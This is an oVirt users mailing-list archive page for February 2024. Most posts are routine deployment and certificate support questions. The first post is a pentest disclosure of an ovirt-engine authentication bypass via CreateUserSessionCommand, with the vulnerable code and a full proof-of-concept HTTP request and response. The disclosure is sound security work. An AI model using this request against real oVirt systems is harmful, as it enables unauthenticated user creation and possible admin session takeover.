February 2024 - Users - Ovirt List Archives

Internal pentest result : Ovirt-engine authentication bypass

by Jirka Simon

Hello ovirt comunity. We had an internal pentest here and one finding is *Ovirt-engine authentication bypass.* Ovirt-engine, as deployed on ovirtm.XXX.XXX.cz, contains an authentication bypass. It is possible to directly call the CreateUserSessionCommand using runAction exposed by /ovirt- engine/webadmin/GenericApiGWTService. *This action explicitly enables everyone to call it:* ```/ @Override protected boolean isUserAuthorizedToRunAction() { return true; } /``` The behavior of this call differs based on the ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration option: ``` /boolean externalSsoEnabled = EngineLocalConfig.getInstance().getBoolean("ENGINE_SSO_ENABLE_EXTERNAL_SSO"); DbUser dbUser = externalSsoEnabled ? dbUserDao.getByUsernameAndDomain(params.getPrincipalName(), authzName) : dbUserDao.getByExternalId(authzName, params.getPrincipalId());/ ``` If this option is enabled, usernames are used to locate users. If it's disabled, the externalId (which seems to be a randomly generated GUID) is used to locate users. If the specified user exists, a session is returned for the user. If the specified user doesn't exist, the user is created in the system. However, the user doesn't get assigned any group membership or rights, therefore the session creation fails because of the missing Login right. The attempt to modify the users table can be seen in the SQL error message when attempting to use a null value for the username (as the endpoint uses GWT, the payload is mostly unreadable): ``` /POST /ovirt-engine/webadmin/GenericApiGWTService HTTP/1.1 Host: ovirtm.xxx.xxx.cz 14 Final Report: Results of penetration testing (internal, external, Wi-Fi) 21 December 2023 Cookie: JSESSIONID=wsp3WAo63LZGHfpB__stEt4lZ7z_zZycpzIprNlT.ovirtm45; Content-Type: text/x-gwt-rpc; charset=utf-8 X-GWT-Module-Base: https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin X-GWT-Permutation: D7ECB5EF5E29205D18271CC08183A28D Ovirt-Xsrf-Token: 4D87D03B631F8506FC668AA4C3FE3F443D723A9F379FDBB8B0D6DA0668650375 Content-Length: 869 7|0|23|https://ovirtm.xxx.xxx.cz/ovirt- engine/webadmin|0D1B4DEE9D1424E18C443F1CD1C11574|org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWT Service|runAction|org.ovirt.engine.core.common.action.ActionType/2930387551|org.ovirt.engine.core.commo n.action.ActionParametersBase/2903049429|org.ovirt.engine.core.common.action.CreateUserSessionParameter s/2744166832|appScope|email|firstName|java.util.ArrayList/4159755760|lastName|namespace|principalId|adm in|internal|sourceIp|ssoScope|ssoToken|org.ovirt.engine.core.common.action.ActionParametersBase$EndProc edure/1568822488|java.util.Collections$EmptyMap/4174664486|org.ovirt.engine.core.common.businessentitie s.VDSStatus/1938301532|org.ovirt.engine.core.compat.TransactionScopeOption/1475850853|1|2|3|4|2|5|6|5|2 01|7|0|8|9|10|11|0|12|13|14|0|16|17|18|19|0|5|0|0|0|0|20|1|0|11|0|0|0|0|0|0|21|0|- 4|22|0|1|0|1|23|2|0|0|0| HTTP/1.1 200 OK Date: Fri, 15 Dec 2023 09:42:35 GMT Server: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k mod_auth_gssapi/1.6.1 Expires: Thu, 14 Dec 2023 09:42:35 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: locale=cs_CZ; path=/; secure; HttpOnly; Max-Age=2147483647; Expires=Wed, 02-Jan-2092 12:56:42 GMT X-XSS-PROTECTION: 1; MODE=BLOCK Pragma: no-cache X-FRAME-OPTIONS: SAMEORIGIN Content-Disposition: attachment X-CONTENT-TYPE-OPTIONS: NOSNIFF Content-Length: 1794 Content-Type: application/json;charset=utf-8 Correlation-Id: 664c1c1f-9a75-4e14-94d7-aba12c5442f5 Connection: close //OK[0,5,4,8,3,1,2,474,7,6,1,0,2,0,2,5,1,0,4,3,1,2,0,2,1,1,["org.ovirt.engine.core.common.action.Action ReturnValue/4163585948","java.util.ArrayList/4159755760","java.lang.String/2004016611","ENGINE","","org .ovirt.engine.core.common.errors.EngineFault/2377218566","org.ovirt.engine.core.common.errors.EngineErr or/2640515959","ERROR: null value in column \"username\" violates not-null constraint\n Detail: Failing row contains (6dad5e2f-7c95-4547-8f08-6936494c91b6, firstName, lastName, internal-authz, null, , email, , f, principalId, 2023-12-14 17:51:04.757747+01, 2023-12-15 10:42:35.125994+01, namespace, firstName(a)internal-authz).\n Where: SQL statement \"UPDATE users\n SET department \u003D v_department,\n domain \u003D v_domain,\n email \u003D v_email,\n name \u003D v_name,\n note \u003D v_note,\n surname \u003D v_surname,\n username \u003D v_username,\n external_id \u003D v_external_id,\n namespace \u003D v_namespace,\n _update_date \u003D CURRENT_TIMESTAMP\n WHERE external_id \u003D v_external_id\n AND domain \u003D v_domain\"\nPL/pgSQL function updateuserimpl(character varying,character varying,character varying,character varying,character varying,character varying,uuid,character varying,text,character varying) line 5 at SQL statement\nSQL statement \"SELECT UpdateUserImpl(\n v_department,\n v_domain,\n v_email,\n v_name,\n v_note,\n v_surname,\n v_user_id,\n v_username,\n v_external_id,\n v_namespace)\"\nPL/pgSQL function updateuser(character varying,character varying,character varying,character varying,character varying,character varying,uuid,character varying,boolean,text,character varying) line 3 at PERFORM"],0,7]/ ``` Fortunately, in our deplyoment the ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration was set to false, so to create a session for the admin it would be necessary to know the admin's user externalId. However, as this is not the default configuration, it is possible that a later reinstallation could change the value. Still, it was possible to create users in the system without any authentication. What is the best way to report this security issue? Thank you Jirka

2 months, 3 weeks

2
3
0 / 0

hosted-engine --deploy fails, apparently due to not finding storage pool

by iucounu＠gmail.com

Hi, I'm trying to deploy a self hosted engine, and it gets to 'Wait for the host to be up' and then fails about 20mins later. Checking the hosted engine setup log, the failure seems to be to do with a storage pool not being found (see error below). Is this error referring to the storage pool that the hosted engine will use? The setup script does not ask me what kind of storage I want to use, or the path for it, does it auto detect this? The host I am running the engine setup on is part of a gluster cluster, which I have provisioned for this purpose. Do I need to edit a file somewhere to specify this, or is there something else I need to do (permissions etc)? The hosted engine VM itself comes up fine, and I can get a console on it via virsh. Thanks for any help, kind regards, Cam 2024-02-08 16:39:04,438+0000 DEBUG otopi.ovirt_hosted_engine_setup.ansible_utils ansible_utils._process_output:109 {'changed': True, 'stdout': '', 'stderr': "error: failed to get pool 'localvm0bod0wzw'\nerror: Storage pool not found: no storage pool with matching name 'localvm0bod0wzw'", 'rc': 1, 'cmd': ['virsh', '-c', 'qemu:///system?authfile=/etc/ovirt-hosted-engine/virsh_auth.conf', 'pool-destroy', 'localvm0bod0wzw'], 'start': '2024-02-08 16:39:04.246510', 'end': '2024-02-08 16:39:04.301790', 'delta': '0:00:00.055280', 'msg': 'non-zero return code', 'invocation': {'module_args': {'_raw_params': 'virsh -c qemu:///system?authfile=/etc/ovirt-hosted-engine/virsh_auth.conf pool-destroy localvm0bod0wzw', '_uses_shell': False, 'stdin_add_newline': True, 'strip_empty_ends': True, 'argv': None, 'chdir': None, 'executable': None, 'creates': None, 'removes': None, 'stdin': None}}, 'stdout_lines': [], 'stderr_lines': ["error: failed to get pool 'localvm0bod0wzw'", "error: Storage pool not fou nd: no storage pool with matching name 'localvm0bod0wzw'"], '_ansible_no_log': None} 2024-02-08 16:39:04,539+0000 DEBUG otopi.ovirt_hosted_engine_setup.ansible_utils ansible_utils._process_output:109 ignored: [localhost]: FAILED! => {"changed": true, "cmd": ["virsh", "-c", "qemu:///system?authfile=/etc/ovirt-hosted-engine/virsh_auth.conf", "pool-destroy", "localvm0bod0wzw"], "delta": "0:00:00.055280", "end": "2024-02-08 16:39:04.301790", "msg": "non-zero return code", "rc": 1, "start": "2024-02-08 16:39:04.246510", "stderr": "error: failed to get pool 'localvm0bod0wzw'\nerror: Storage pool not found: no storage pool with matching name 'localvm0bod0wzw'", "stderr_lines": ["error: failed to get pool 'localvm0bod0wzw'", "error: Storage pool not found: no storage pool with matching name 'localvm0bod0wzw'"], "stdout": "", "stdout_lines": []} 2024-02-08 16:39:04,839+0000 DEBUG otopi.ovirt_hosted_engine_setup.ansible_utils ansible_utils._process_output:109 {'changed': True, 'stdout': '', 'stderr': "error: failed to get pool 'localvm0bod0wzw'\nerror: Storage pool not found: no storage pool with matching name 'localvm0bod0wzw'", 'rc': 1, 'cmd': ['virsh', '-c', 'qemu:///system?authfile=/etc/ovirt-hosted-engine/virsh_auth.conf', 'pool-undefine', 'localvm0bod0wzw'], 'start': '2024-02-08 16:39:04.638774', 'end': '2024-02-08 16:39:04.691953', 'delta': '0:00:00.053179', 'msg': 'non-zero return code', 'invocation': {'module_args': {'_raw_params': 'virsh -c qemu:///system?authfile=/etc/ovirt-hosted-engine/virsh_auth.conf pool-undefine localvm0bod0wzw', '_uses_shell': False, 'stdin_add_newline': True, 'strip_empty_ends': True, 'argv': None, 'chdir': None, 'executable': None, 'creates': None, 'removes': None, 'stdin': None}}, 'stdout_lines': [], 'stderr_lines': ["error: failed to get pool 'localvm0bod0wzw'", "error: Storage pool not f ound: no storage pool with matching name 'localvm0bod0wzw'"], '_ansible_no_log': None} 2024-02-08 16:39:04,940+0000 DEBUG otopi.ovirt_hosted_engine_setup.ansible_utils ansible_utils._process_output:109 ignored: [localhost]: FAILED! => {"changed": true, "cmd": ["virsh", "-c", "qemu:///system?authfile=/etc/ovirt-hosted-engine/virsh_auth.conf", "pool-undefine", "localvm0bod0wzw"], "delta": "0:00:00.053179", "end": "2024-02-08 16:39:04.691953", "msg": "non-zero return code", "rc": 1, "start": "2024-02-08 16:39:04.638774", "stderr": "error: failed to get pool 'localvm0bod0wzw'\nerror: Storage pool not found: no storage pool with matching name 'localvm0bod0wzw'", "stderr_lines": ["error: failed to get pool 'localvm0bod0wzw'", "error: Storage pool not found: no storage pool with matching name 'localvm0bod0wzw'"], "stdout": "", "stdout_lines": []} 2024-02-08 16:39:05,141+0000 DEBUG otopi.ovirt_hosted_engine_setup.ansible_utils ansible_utils._process_output:109 {'msg': 'The task includes an option with an undefined variable. The error was: \'local_vm_disk_path\' is undefined. \'local_vm_disk_path\' is undefined\n\nThe error appears to be in \'/usr/share/ansible/collections/ansible_collections/ovirt/ovirt/roles/hosted_engine_setup/tasks/clean_local_storage_pools.yml\': line 16, column 7, but may\nbe elsewhere in the file depending on the exact syntax problem.\n\nThe offending line appears to be:\n\n changed_when: true\n - name: Destroy local storage-pool {{ local_vm_disk_path.split(\'/\')[5] }}\n ^ here\nWe could be wrong, but this one looks like it might be an issue with\nmissing quotes. Always quote template expression brackets when they\nstart a value. For instance:\n\n with_items:\n - {{ foo }}\n\nShould be written as:\n\n with_items:\n - "{{ foo }}"\n', '_ansible_no_log': False} 2024-02-08 16:39:05,241+0000 DEBUG otopi.ovirt_hosted_engine_setup.ansible_utils ansible_utils._process_output:109 ignored: [localhost]: FAILED! => {"msg": "The task includes an option with an undefined variable. The error was: 'local_vm_disk_path' is undefined. 'local_vm_disk_path' is undefined\n\nThe error appears to be in '/usr/share/ansible/collections/ansible_collections/ovirt/ovirt/roles/hosted_engine_setup/tasks/clean_local_storage_pools.yml': line 16, column 7, but may\nbe elsewhere in the file depending on the exact syntax problem.\n\nThe offending line appears to be:\n\n changed_when: true\n - name: Destroy local storage-pool {{ local_vm_disk_path.split('/')[5] }}\n ^ here\nWe could be wrong, but this one looks like it might be an issue with\nmissing quotes. Always quote template expression brackets when they\nstart a value. For instance:\n\n with_items:\n - {{ foo }}\n\nShould be written as:\n\n with_items:\n - \"{{ foo }}\"\n"} 2024-02-08 16:39:05,442+0000 DEBUG otopi.ovirt_hosted_engine_setup.ansible_utils ansible_utils._process_output:109 {'msg': 'The task includes an option with an undefined variable. The error was: \'local_vm_disk_path\' is undefined. \'local_vm_disk_path\' is undefined\n\nThe error appears to be in \'/usr/share/ansible/collections/ansible_collections/ovirt/ovirt/roles/hosted_engine_setup/tasks/clean_local_storage_pools.yml\': line 22, column 7, but may\nbe elsewhere in the file depending on the exact syntax problem.\n\nThe offending line appears to be:\n\n changed_when: true\n - name: Undefine local storage-pool {{ local_vm_disk_path.split(\'/\')[5] }}\n ^ here\nWe could be wrong, but this one looks like it might be an issue with\nmissing quotes. Always quote template expression brackets when they\nstart a value. For instance:\n\n with_items:\n - {{ foo }}\n\nShould be written as:\n\n with_items:\n - "{{ foo }}"\n', '_ansible_no_log': False} 2024-02-08 16:39:05,543+0000 DEBUG otopi.ovirt_hosted_engine_setup.ansible_utils ansible_utils._process_output:109 ignored: [localhost]: FAILED! => {"msg": "The task includes an option with an undefined variable. The error was: 'local_vm_disk_path' is undefined. 'local_vm_disk_path' is undefined\n\nThe error appears to be in '/usr/share/ansible/collections/ansible_collections/ovirt/ovirt/roles/hosted_engine_setup/tasks/clean_local_storage_pools.yml': line 22, column 7, but may\nbe elsewhere in the file depending on the exact syntax problem.\n\nThe offending line appears to be:\n\n changed_when: true\n - name: Undefine local storage-pool {{ local_vm_disk_path.split('/')[5] }}\n ^ here\nWe could be wrong, but this one looks like it might be an issue with\nmissing quotes. Always quote template expression brackets when they\nstart a value. For instance:\n\n with_items:\n - {{ foo }}\n\nShould be written as:\n\n with_items:\n - \"{{ foo }}\"\n"} 2024-02-08 16:39:05,643+0000 DEBUG otopi.ovirt_hosted_engine_setup.ansible_utils ansible_utils._process_output:109 PLAY RECAP [localhost] : ok: 22 changed: 4 unreachable: 0 skipped: 2 failed: 0

2 months, 4 weeks

1
0
0 / 0

Unable to upload images

by avegab＠indra.es

Hello friends! I can't upload images; when I click on test connection, I encounter the certificate issue. I used to be able to upload images without any problem, but this issue started when I updated the certificates of the Hosts and reinstalled one of the Hosts so it could also deploy the engine. I am sure that the certificate is registered in the browser. Could you help me? Thank you. ovirt-imageio --show-config { "backend_file": { "buffer_size": 8388608 }, "backend_http": { "buffer_size": 8388608, "ca_file": "/etc/pki/ovirt-engine/ca.pem" }, "backend_nbd": { "buffer_size": 8388608 }, "control": { "port": 54324, "prefer_ipv4": true, "remove_timeout": 60, "socket": "/run/ovirt-imageio/sock", "transport": "tcp" }, "daemon": { "drop_privileges": true, "group_name": "ovirtimg", "max_connections": 8, "poll_interval": 1.0, "run_dir": "/run/ovirt-imageio", "user_name": "ovirtimg" }, "formatter_long": { "format": "%(asctime)s %(levelname)-7s (%(threadName)s) [%(name)s] %(message)s" }, "formatters": { "keys": "long" }, "handler_logfile": { "args": "(\"/var/log/ovirt-imageio/daemon.log\",)", "formatter": "long", "class": "logging.handlers.RotatingFileHandler", "kwargs": "{\"maxBytes\": 20971520, \"backupCount\": 10}", "level": "DEBUG" }, "handler_stderr": { "args": "()", "formatter": "long", "class": "logging.StreamHandler", "level": "DEBUG" }, "handlers": { "keys": "logfile" }, "local": { "enable": false, "socket": "\u0000/org/ovirt/imageio" }, "logger_root": { "handlers": "logfile", "level": "INFO", "propagate": 0 }, "loggers": { "keys": "root" }, "profile": { "filename": "/run/ovirt-imageio/profile" }, "remote": { "host": "::", "port": 54323 }, "tls": { "ca_file": "/etc/pki/ovirt-engine/apache-ca.pem", "cert_file": "/etc/pki/ovirt-engine/certs/apache.cer", "enable": true, "enable_tls1_1": false, "key_file": "/etc/pki/ovirt-engine/keys/apache.key.nopass" } }

3 months

1
0
0 / 0

Enable hpet on specific vm

by ricardoot＠gmail.com

Hello friends, Please. Does anyone know how to use hooks to activate hpet in a VM? I have tried using qemu_cmdline with this configuration ["-rtc", "hpet,timer-states=3"] and with this other ["-rtc", "hpet= on"] but it gives me this error: "VM w2022 is down with error. Exit message: internal error: process exited while connecting to monitor: qemu-kvm: -rtc hpet=on: Invalid parameter 'hpet'." And VM not starup. I have read that https://www.ovirt.org/develop/developer-guide/vdsm/hooks.html and try to use: https://www.ovirt.org/develop/developer-guide/vdsm/hook/qemucmdline.html https://novamostra.com/2021/05/11/make-ovirt-vm-reflect-host-hardware-pro... I've been trying to solve this for a long time. I wrote another post that brought me to try using hooks: https://lists.ovirt.org/archives/list/users@ovirt.org/thread/VGUARICFTRVH... Thanks so much.

3 months

1
0
0 / 0

Problem with ovirt-websocket-proxy updated certified.

by Kalil de A. Carvalho

Hello all. In my company we have a oVit 4.5.4 that was worrying fine until today when the Apache certified expereid. Looking for how I can updated ti, followed here: https://lists.ovirt.org/archives/list/users@ovirt.org/thread/ZI5WNU6OB6FZ... I could access my engine. A secunde problem apeready when me and my colleagues tried to access any VM through noVNC On the web tab show us this message: "Something went wrong, connection is closed" When I went on the engine discovery that Websocket-proxy certified was expired too. I tried tha same procedure above but on the tab was the same message but on /var/log/message show us this: Feb 2 16:30:46 engine journal[5391]: 2024-02-02 16:30:46,072-0300 ovirt-websocket-proxy: INFO msg:601 handler exception: [SSL: TLSV1_ALERT_UNKNOWN_C A] tlsv1 alert unknown ca (_ssl.c:1129) Feb 2 16:30:46 engine ovirt-websocket-proxy.py[5391]: ovirt-websocket-proxy[5391] INFO msg:601 handler exception: [SSL: TLSV1_ALERT_UNKNOWN_CA] tlsv 1 alert unknown ca (_ssl.c:1129) I updated the CA-CERTIFITES, re-checked all paths to be sure that was correct but nothing worked. Has anyone passed through this problem? Best regards, -- Atenciosamente, Kalil de A. Carvalho

3 months

2
1
0 / 0

can hosted engine deploy use local repository mirrors instead of internet ones?

by iucounu＠gmail.com

Hi, hosted-engine --deploy is failing as it is trying to connect to mirrorlist.centos.org: [ INFO ] TASK [ovirt.ovirt.engine_setup : Install required packages for oVirt Engine deployment] [ INFO ] ok: [localhost] [ INFO ] TASK [ovirt.ovirt.engine_setup : Install oVirt Engine package] [ ERROR ] fatal: [localhost -> 192.168.1.187]: FAILED! => {"changed": false, "msg": "Failed to download metadata for repo 'centos-ceph-pacific': Cannot prepare internal mirrorlist: Curl error (7): Couldn't connect to server for http://mirrorlist.centos.org/?release=8-stream&arch=x86_64&repo=storage-c... [Failed to connect to mirrorlist.centos.org port 80: Connection refused]", "rc": 1, "results": []} Opening up access to the internet is a bureaucratic procedure for us, as would be for adding all the URLs to the proxy. We have a lot of repos mirrored locally - is it possible to get hosted-engine to use the local ones? Is there a list? I had a search for files that might contain these repos in various places, but to no avail. Thanks for any help! Cam

3 months

4
4
0 / 0

Nested Virtualization in AMD Ryzen

by LS CHENG

Hi all I am running OLVM 4.5, this is a test setup which was running in my old workstation with Intel CPU and is nested virtualization (with VMWare Workstation), the host was running Windows 7 x64, I moved to AMD Ryzen 7950X3D a couple of days ago which runs Windows 11 x64 with 128GB memory then moved OLVM VM's from the old workstation to this new workstation. The problem I face now is the KVM hosts shows this error *Host kvm1 moved to Non-Operational state as host CPU type is not supported in this cluster compatibility version or is not supported at all* I modified /etc/modprobe.d/kvm.conf and changed options kvm_amd nested=0 to options kvm_amd nested=1 reboot the kvm host but still getting same error, I verified the modification and seems good [root@kvm1 ~]# cat /sys/module/kvm_amd/parameters/nested 1 In Windows 11 I have hyper-v off and Memory Integrity is also off. Am I missing any additional steps? Thanks

3 months

2
5
0 / 0

Upgrade from oVirt 4.5.4 to oVirt 4.5.5 - nothing provides selinux-policy >= 38.1.27-1.el9

by Devin A. Bougie

Hi, All. We're having trouble updating our 4.5.4 cluster to 4.5.5. We're running a self-hosted engine on fully updated AlmaLinux 9 hosts, and get the following errors when trying to upgrade to 4.5.5. Any suggestions would be greatly appreciated. Many thanks, Devin ------ [root@lnxvirt01 ~]# dnf clean all 157 files removed [root@lnxvirt01 ~]# dnf update CLASSE Packages - x86_64 36 MB/s | 569 kB 00:00 CentOS-9-stream - Ceph Pacific 839 kB/s | 557 kB 00:00 CentOS-9-stream - Gluster 10 240 kB/s | 56 kB 00:00 CentOS-9 - RabbitMQ 38 354 kB/s | 104 kB 00:00 CentOS Stream 9 - NFV OpenvSwitch 923 kB/s | 154 kB 00:00 CentOS-9 - OpenStack yoga 5.7 MB/s | 3.0 MB 00:00 CentOS Stream 9 - OpsTools - collectd 228 kB/s | 51 kB 00:00 CentOS Stream 9 - oVirt 4.5 6.2 MB/s | 1.0 MB 00:00 oVirt upstream for CentOS Stream 9 - oVirt 4.5 1.0 kB/s | 7.5 kB 00:07 AlmaLinux 9 - AppStream 87 MB/s | 7.7 MB 00:00 AlmaLinux 9 - BaseOS 72 MB/s | 2.4 MB 00:00 AlmaLinux 9 - BaseOS - Debug 9.9 MB/s | 1.9 MB 00:00 AlmaLinux 9 - CRB 67 MB/s | 2.3 MB 00:00 AlmaLinux 9 - Extras 1.5 MB/s | 17 kB 00:00 AlmaLinux 9 - HighAvailability 29 MB/s | 434 kB 00:00 AlmaLinux 9 - NFV 56 MB/s | 1.0 MB 00:00 AlmaLinux 9 - Plus 2.5 MB/s | 22 kB 00:00 AlmaLinux 9 - ResilientStorage 30 MB/s | 446 kB 00:00 AlmaLinux 9 - RT 53 MB/s | 1.0 MB 00:00 AlmaLinux 9 - SAP 874 kB/s | 9.7 kB 00:00 AlmaLinux 9 - SAPHANA 1.3 MB/s | 13 kB 00:00 Error: Problem 1: cannot install the best update candidate for package ovirt-vmconsole-1.0.9-1.el9.noarch - nothing provides selinux-policy >= 38.1.27-1.el9 needed by ovirt-vmconsole-1.0.9-3.el9.noarch from centos-ovirt45 - nothing provides selinux-policy-base >= 38.1.27-1.el9 needed by ovirt-vmconsole-1.0.9-3.el9.noarch from centos-ovirt45 Problem 2: package ovirt-vmconsole-host-1.0.9-3.el9.noarch from centos-ovirt45 requires ovirt-vmconsole = 1.0.9-3.el9, but none of the providers can be installed - cannot install the best update candidate for package ovirt-vmconsole-host-1.0.9-1.el9.noarch - nothing provides selinux-policy >= 38.1.27-1.el9 needed by ovirt-vmconsole-1.0.9-3.el9.noarch from centos-ovirt45 - nothing provides selinux-policy-base >= 38.1.27-1.el9 needed by ovirt-vmconsole-1.0.9-3.el9.noarch from centos-ovirt45 (try to add '--skip-broken' to skip uninstallable packages or '--nobest' to use not only best candidate packages) ------

3 months

3
3
0 / 0

oVirt 4.5.5 - Prb with qemu-kvm after upgrade

by Christophe GRENIER

Hello I have a standalone oVirt Manager 4.5.5-1.el8 and two small clusters. After upgrading ovir01001 in the "PreProd" cluster from AlmaLinux 8.8 to 8.9, the host was successfully activated but failed to take any VM. centos-release-ceph-pacific.noarch 1.0-2.el8 @cs8-extras centos-release-gluster10.noarch 1.0-1.el8s @cs8-extras-common centos-release-nfv-common.noarch 1-3.el8 @cs8-extras centos-release-nfv-openvswitch.noarch 1-3.el8 @cs8-extras centos-release-opstools.noarch 1-12.el8 @cs8-extras centos-release-ovirt45.noarch 8.9-1.el8s @cs8-extras-common centos-release-storage-common.noarch 2-2.el8 @cs8-extras centos-release-stream.x86_64 8.1-1.1911.0.7.el8 @cs8-extras centos-release-virt-common.noarch 1-2.el8 @cs8-extras vdsm.x86_64 4.50.5.1-1.el8 @centos-ovirt45 The problem has been "solved" by downgrading all qemu-* packages to the version in AlmaLinux 8.8 ie. qemu-kvm-6.2.0-40.module_el8.9.0+3681+41cbbcc0.1.alma.1 => qemu-kvm-6.2.0-33.module_el8.8.0+3612+f18d2b89.alma.1.x86_64 Please find the relevent log: - engine_when_failed.log https://pastebin.com/7MG6fYGY - engine_when_ok.log https://pastebin.com/MegqmMbg - vdsm_when_failed.log https://pastebin.com/ae4w0pix - vdsm_when_ok.log https://pastebin.com/d7P0BWDN Has someone tried to update to 8.9 ? Regards -- ,-~~-.___. ._. / | ' \ | |--------. Christophe GRENIER ( ) 0 | | | grenier(a)cgsecurity.org \_/-, ,----' | | | ==== !_!-v---v--. / \-'~; .--------. TestDisk & PhotoRec / __/~| ._-""|| | Data Recovery =( _____|_|____||________| https://www.cgsecurity.org

3 months

1
0
0 / 0

Major screwup and now I can't bring anything up

by John Florian

I have a small home oVirt 4.5 deployment that was struggling a bit and I think I've only made things worse. I was seeing some SSL errors in various places but couldn't find any evidence of an expired cert though maybe I overlooked something. At present, it looks like the most immediate problem is that the engine.log is showing SyncNetworkProviderCommand fails saying EngineException: (Failed with error Unsupported or unrecognized SSL message and code 5050). For now, I'm only concerning myself to one Host that had been running VMs until I tried restarting everything from a power off. I take it that the sync failure prevents this Host from becoming active. I had successfully been using this setup for many years. I do have my own web cert on the engine signed by my CA. While I was getting this same "code 5050" error before with things like ovirt-imageio (what prompted my initial digging), now I'm afraid I've only made things more complex. See, I was running FreeIPA on a pair of VMs. In the past, this pair of VMs would auto-start once the oVirt Engine and Hosts were going and I had no issue. But now I wonder to what extent OSCP being unreachable might affect the SSL errors. What's the best/easiest/safest way out of this mess? Should I just wipe ovirt-engine of all the non-rpm provided files in /etc/pki/ovirt-engine/ and redo the engine-setup? I'm afraid of making things worse before I begin attempting that.

3 months

2
1
0 / 0

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

Users February 2024